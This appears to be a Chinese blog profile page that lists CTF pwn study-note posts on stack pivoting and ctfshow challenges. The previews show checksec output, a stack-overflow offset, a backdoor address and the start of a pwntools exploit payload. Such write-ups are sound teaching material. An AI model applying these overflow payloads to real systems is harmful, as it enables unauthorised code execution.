- 博客(3)
- 收藏
- 关注
RSS订阅原创 简单栈迁移学习笔记
BUU gyctf_2020_borrowstack学习笔记查看保护gyctf_2020_borrowstack$ checksec pwn1 [*] '/home/pwn/桌面/gyctf_2020_borrowstack/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE
2020-12-02 20:55:04
389
原创 ctfshow pwn题学习笔记
文章目录pwn入门pwn签到题pwn02ctfshow pwn学习笔记(除堆部分)本菜逼不会堆pwn入门pwn签到题nc 直接连pwn02查看保护进入pwnme函数发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850fexp:from pwn import *io = process("./stack")payload = b"a"*(0x9+0x4)+p32(0x804
2020-11-30 17:15:46
5918
4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人